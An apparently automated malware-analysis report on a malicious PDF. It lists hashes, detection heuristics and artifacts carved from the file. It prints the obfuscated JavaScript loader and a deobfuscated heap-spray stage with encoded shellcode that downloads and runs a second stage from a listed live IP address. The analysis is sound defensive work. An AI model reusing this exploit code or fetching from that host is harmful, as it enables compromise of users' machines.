Malicious PDF — malware analysis report

Static analysis result for SHA-256 58402d3f9d5d6ebb…

Verdict: MALICIOUS
File type: PDF
Size: 29.3 KB
First seen: 2026-05-09
MD5: f0375246b761bb9e13f93e90b3d693b9
SHA-1: 3aaf137c552c69242bdb2abdba23eb113190f004
SHA-256: 58402d3f9d5d6ebbbba49314fe4f985e7ac95e488be842600705ddc8a02d3c19
Risk score: 424

Malware Insights

MITRE ATT&CK
  • T1059.007 Command and Scripting Interpreter: JavaScript
  • T1203 Exploitation for Client Execution

The PDF contains embedded JavaScript that uses `unescape` and `String.fromCharCode` to obfuscate its payload, a technique commonly seen in PDF exploit documents. The script is designed to download a second-stage payload from the URL `http://78.159.122.177/w/l.php?i=13`. This behavior is strongly indicative of a downloader or an exploit-kit stage.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (9)

  • ClamAV: Pdf.Exploit.Agent-36098 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Pdf.Exploit.Agent-36098
  • JavaScript action [low, 3 related findings, PDF_JAVASCRIPT]
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster [critical, PDF_JS_EXPLOIT_CLUSTER]
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script:
    /*pnG5Gw4Gz9ghQPtI <YopqB8nEHZ> Pu4nqGFn4Zrgf6mhi*//*pnG5Gw4Gz9ghQPtI <YopqB8nEHZ> Pu4nqGFn4Zrgf6mhi*/eval(/*pnG5Gw4Gz9ghQPtI <YopqB8nEHZ> Pu4nqGFn4Zrgf6mhi*//*pnG5Gw4Gz9ghQPtI <YopqB8nEHZ> Pu4nqGFn4Zrgf6mhi*/unescape(/*pnG5Gw4Gz9ghQPtI <YopqB8nEHZ> Pu4nqGFn4Zrgf6mhi*/this.subject.replace(/Normal/mig,String.fromCharCode(50-10-3)).replace(/Pokemon/mig,'B')/*pnG5Gw4Gz9ghQPtI <YopqB8nEHZ> Pu4nqGFn4Zrgf6mhi*/)/*pnG5Gw4Gz9ghQPtI <YopqB8nEHZ> Pu4nqGFn4Zrgf6mhi*/);
  • PDF exploit shellcode contains an embedded download URL [high, PDF_JS_SHELLCODE_DOWNLOAD_URL]
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream [low, PDF_JS]
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • RichMedia (Flash) [high, PDF_RICHMEDIA]
    PDF contains /RichMedia (Adobe Flash), which is a historic exploit vector.
  • Suspicious extracted artifact [medium, EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded file [low, PDF_EMBEDDED]
    PDF embeds a file attachment, which could carry an executable or another weaponised document as a nested payload.
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://78.159.122.177/w/l.php?i=13 (referenced by PDF JavaScript)

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Artifact 1
  Filename: SWFNAME.swf
  Kind: pdf-embedded-file
  Source: PDF EmbeddedFile object 16 at offset 0xC27
  Size: 26777 bytes
  SHA-256: a98024b4ee1377e872e3ebaf1c361600c270db5fd5ba79f256106c0c566dde29
  Detection: ClamAV: Pdf.Exploit.Agent-35955
  Obfuscation or payload: likely
  Notes: actual_type=SWF; declared_or_context_type=PDF; filename=SWFNAME.swf; kind=pdf-embedded-file. Carved artifact entropy is 7.99, consistent with packed or encrypted content.

Artifact 2
  Filename: javascript_obj0006_000.js
  Kind: pdf-javascript-stream
  Source: PDF /JS object 6 at offset 0x82B
  Size: 462 bytes
  SHA-256: e1ab3bbf30605cecdce6db9d2556198626dbb178f7a4cb471a9436bb6e8bd92f
  Detection: ClamAV: No threats found
  Obfuscation or payload: likely
  Notes: Carved artifact contains 3 eval/decoder/string-building token(s).
  Preview script (first 1,000 lines of the extracted script):
/*pnG5Gw4Gz9ghQPtI <YopqB8nEHZ> Pu4nqGFn4Zrgf6mhi*//*pnG5Gw4Gz9ghQPtI <YopqB8nEHZ> Pu4nqGFn4Zrgf6mhi*/eval(/*pnG5Gw4Gz9ghQPtI <YopqB8nEHZ> Pu4nqGFn4Zrgf6mhi*//*pnG5Gw4Gz9ghQPtI <YopqB8nEHZ> Pu4nqGFn4Zrgf6mhi*/unescape(/*pnG5Gw4Gz9ghQPtI <YopqB8nEHZ> Pu4nqGFn4Zrgf6mhi*/this.subject.replace(/Normal/mig,String.fromCharCode(50-10-3)).replace(/Pokemon/mig,'B')/*pnG5Gw4Gz9ghQPtI <YopqB8nEHZ> Pu4nqGFn4Zrgf6mhi*/)/*pnG5Gw4Gz9ghQPtI <YopqB8nEHZ> Pu4nqGFn4Zrgf6mhi*/);
Artifact 3
  Filename: legacy_pdfkit_stage_000.js
  Kind: deobfuscated-js
  Source: repeated-marker hex decoded JavaScript at offset 0x64
  Size: 3470 bytes
  SHA-256: 2bb12043ad750419a6c9f63b83e389cbcc0e2d5620c930ba40554d28de68a793
  Preview script (first 1,000 lines of the extracted script):
var u = unescape;var s = u('%u0c0c%u0c0c%u4919%u0700%ucccc%ucccc%u48ef%u0700%u156f%u0700%ucccc%ucccc%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u9033%u0700%u9084%u0700%u0c0c%u0c0c%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u9084%u0700%u1599%u0700%u0124%u0001%u72f7%u0700%u0104%u0001%u15bb%u0700%u1000%u0000%u154d%u0700%u15bb%u0700%u0300%u7ffe%u7fb2%u0700%u15bb%u0700%u0011%u0001%ua8ac%u0700%u15bb%u0700%u0100%u0001%ua8ac%u0700%u72f7%u0700%u0011%u0001%u52e2%u0700%u5c54%u0700%uffff%uffff%u0100%u0001%u0000%u0000%u0104%u0001%u1000%u0000%u0040%u0000%ud731%u0700%u15bb%u0700%u905a%u9054%u154d%u0700%ua722%u0700%u15bb%u0700%ueb5a%u5815%u154d%u0700%ua722%u0700%u15bb%u0700%u1a8b%u1889%u154d%u0700%ua722%u0700%u15bb%u0700%uc083%u8304%u154d%u0700%ua722%u0700%u15bb%u0700%u04c2%ufb81%u154d%u0700%ua722%u0700%u15bb%u0700%u0c0c%u0c0c%u154d%u0700%ua722%u0700%u15bb%u0700%uee75%u05eb%u154d%u0700%ua722%u0700%u15bb%u0700%ue6e8%uffff%u154d%u0700%ua722%u0700%u15bb%u0700%u90ff%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%u9090%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%u9090%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%uffff%u90ff%u154d%u0700%ud731%u0700%u112f%u0700%u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00%ued83%u310d%u64c0%u4003%u7830%u8b0c%u0c40%u708b%uad1c%u408b%ueb08%u8b09%u3440%u408d%u8b7c%u3c40%u5756%u5ebe%u0001%u0100%ubfee%u014e%u0000%uef01%ud6e8%u0001%u5f00%u895e%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u0263%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%u78c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u8900%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u026e%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95
ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%ua6c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u9d00%u5f5d%u5a5e%u5b59%uc358%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6547%u5474%u6d65%u5070%u7461%u4168%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u5700%u6e69%u7845%u6365%ubb00%uf289%uf789%uc030%u75ae%u29fd%u89f7%u31f9%ubec0%u003c%u0000%ub503%u021b%u0000%uad66%u8503%u021b%u0000%u708b%u8378%u1cc6%ub503%u021b%u0000%ubd8d%u021f%u0000%u03ad%u1b85%u0002%uab00%u03ad%u1b85%u0002%u5000%uadab%u8503%u021b%u0000%u5eab%udb31%u56ad%u8503%u021b%u0000%uc689%ud789%ufc51%ua6f3%u7459%u5e04%ueb43%u5ee9%ud193%u03e0%u2785%u0002%u3100%u96f6%uad66%ue0c1%u0302%u1f85%u0002%u8900%uadc6%u8503%u021b%u0000%uebc3%u0010%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8900%u1b85%u0002%u5600%ue857%uff58%uffff%u5e5f%u01ab%u80ce%ubb3e%u0274%uedeb%u55c3%u4c52%u4f4d%u2e4e%u4c44%u004c%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%u7000%u6664%u7075%u2e64%u7865%u0065%u7263%u7361%u2e68%u6870%u0070%u7468%u7074%u2f3a%u372f%u2e38%u3531%u2e39%u3231%u2e32%u3731%u2f37%u2f77%u2e6c%u6870%u3f70%u3d69%u3331%u9000');var n = u('%u0c0c%u0c0c');while (n.length + 28 < 0x10000){n+=n;}o = n.substring(0, 0x5f4);o += s;o += n;p = o.substring(0, 0x8000);while(p.length < 0x80000){p += p;}q = p.substring(0, 0x7ff74);var m = new Array();for (i=0;i<0x1f0;i++){m[i]=q+'s';}